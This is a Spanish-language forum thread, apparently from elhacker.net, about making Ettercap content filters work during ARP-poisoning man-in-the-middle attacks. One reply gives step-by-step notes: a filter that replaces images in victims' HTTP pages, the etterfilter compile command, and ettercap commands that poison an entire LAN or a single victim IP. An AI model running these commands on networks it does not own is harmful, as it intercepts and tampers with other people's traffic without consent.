Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware
 Autor
|
Tema: Filtros en Ettercap (Leído 4,280 veces)
|
Sierpe_777
 Desconectado
Mensajes: 25
|
Bueno haber tengo una duda, estoy actualmente probando sobre mi red con el Ettercap para windows 0.7.3, y quiero probar los filtros, sin embargo al poner filtros para cambiar alguna imagen por otra como lo muestra esta link http://www.irongeek.com/i.php?page=security/ettercapfilternada mas no se deja, siempre me sale bien la pagina, aclaro no es la primera vez que uso el ettercap, estoy haciendo MITM y estoy envenenando bien a la maquina objetivo, de hecho veo los paquetes que le llegan y todo pero al momento de poner el filtro para cambiar las imagenes que recibe en su explorer no la cambia sigue mostrando la misma alguien ya ha conseguido hacer esa prueba con los filtros? |
|
|
|
|
En línea
|
|
|
|
Makiz0rz
Desconectado
Mensajes: 209
Pero guat de fak?
|
Te dejo unos mini-apuntes que me saqué yo de los filtros de Ettercap para que no se me olvidara como hacerlo, que, aunque basados en esa página (creo), quizás siguiéndolos desde ahí tal y como yo lo hice te sirve de algo. Allá van (te lo copio tal cual, seguramente haya alguna que otra personajada que suelo escribir cuando me hago apuntes xD):
FILTROS ETTERCAP
================
Para hacerles cosas malignas a los usuarios de tu red (o incluso de su propia red, como será lo más habitual  ) hay que seguir los siguientes pasos:
1) Programar un filtro. La sintaxis es casi como C y está bastante bien explicado en man etterfilter.
- Ejemplos:
#-----------------------------------------------------------------------------------------
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"URL_DE_UNA_IMAGEN\" ");
replace("IMG SRC=", "img src=\"URL_DE_UNA_IMAGEN\" ");
msg("El filtro está siendo utilizado woooo.\n");
}
#------------------------------------------------------------------------------------------
Se guarda en un documento de texto con extensión *.filter .
Este filtro modifica los paquetes TCP si vienen por el puerto 80 (HTTP), cambiando el contenido del tag de HTML "img src" con la función
replace (string a, string b). Por lo que las imágenes de todas las webs que se muestren con HTML (no sirve por ejemplo flash) se cambiarán
por la que se haya puesto como segundo parámetro en la función. Con saber un poco de HTML se puede hacer cualquier cosa en las webs
que visiten nuestras desafortunadas víctimas. >=D
Lo que hace exactamente es desplazar la imagen original dentro del tag añadiendo comillas con \", por lo que el navegador la ignora y toma la que le pongamos como verdadera.
Así se puede modificar cualquier paquete de cualquier protocolo que venga por cualquier puerto.
2) Compilarlo con etterfilter.
- etterfilter prueba.filter -o filtro_compilado.ef
3) Elegir la víctima y hacerle envenenamiento ARP ejecutando el filtro.
- Si queremos que toda la red sea víctima del filtro, ponemos:
ettercap -i eth2 -T -q -F filtro_compilado.ef -M ARP // //
* -T interfaz de texto.
* -q quiet-mode.
* -F usar un filtro.
* -M man in the middle, el método que vamos a usar para interceptar los paquetes (concretamente ARP poisoning).
- Si queremos una víctima específica:
ettercap -i eth2 -T -q -F filtro_compilado.ef -M ARP /192.168.1.2/ //
* Obviamente sustituyendo 192.168.1.2 por la ip local de la víctima.
4) Disfrutar.
Debe aparecer en la consola:
"Text only Interface activated...
Hit 'h' for inline help
El filtro está siendo utilizado woooo.
El filtro está siendo utilizado woooo.
...
..."
|
|
|
|
« Última modificación: 4 Diciembre 2008, 21:03 por Makiz0rz »
|
En línea
|
|
|
|
antraXactive
Desconectado
Mensajes: 396
pkg_delete sgae
|
nada mas no se deja, siempre me sale bien la pagina Eso puede ser por que en el filtro se está envenenando todas las cadenas que contienen img src=" Quizás lo que te pase sea por que tienen algún atributo entre el img y el src, prueba con esto: replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
|
|
|
|
|
En línea
|
|
|
|
Makiz0rz
Desconectado
Mensajes: 209
Pero guat de fak?
|
nada mas no se deja, siempre me sale bien la pagina Eso puede ser por que en el filtro se está envenenando todas las cadenas que contienen img src=" Quizás lo que te pase sea por que tienen algún atributo entre el img y el src, prueba con esto: replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
Pero eso te puede cambiar más tags que tienen el atributo "src" y no son imágenes.
|
|
|
|
|
En línea
|
|
|
|
Sierpe_777
Desconectado
Mensajes: 25
|
replace("src=", "src=\" http://www.irongeek.com/images/jollypwn.png\" "); ya lo habia intentado pero nada por el comando de consola que pusiste makiz de eth01 asumo que estas en linux? sera que la version compilada sobre windows no jale bien, porque sigo sin lograr nada saludos espero me puedan seguir ayudando |
|
|
|
|
En línea
|
|
|
|
Makiz0rz
Desconectado
Mensajes: 209
Pero guat de fak?
|
Si, si, estaba en Linux.
Bueno pues pillate un LiveCD de Backtrack o alguno de esos que tienen esos programillas instalados y prueba a hacerlo ahi, a lo mejor el procedimiento lo haces bien pero es el Güindous el que no te deja, no lo se, yo en Güindous no he probado nada de esto xD.
Suerte
|
|
|
|
|
En línea
|
|
|
|
jeremy13
Desconectado
Mensajes: 2
|
Siento revivir un mensaje tan viejo pero a mi me pasa exactamente lo mismo, uso ubuntu y tengo ettercap instalado. tengo mi portatil y mi pc conectados por wifi, el mitm está bien hecho ya que puedo ver todo el tráfico de mi portátil. El problema es que cuando creo mi filtro y ejecuto el ettercap, parece hacer caso omiso de los replace("foo","bar"); y de los search(DATA.data,"foobar"); (al menos para el trafico del puerto 80)
¿alguien sabe porqué puede ser esto?
Muchas gracias.
|
|
|
|
|
En línea
|
|
|
|
|
 |
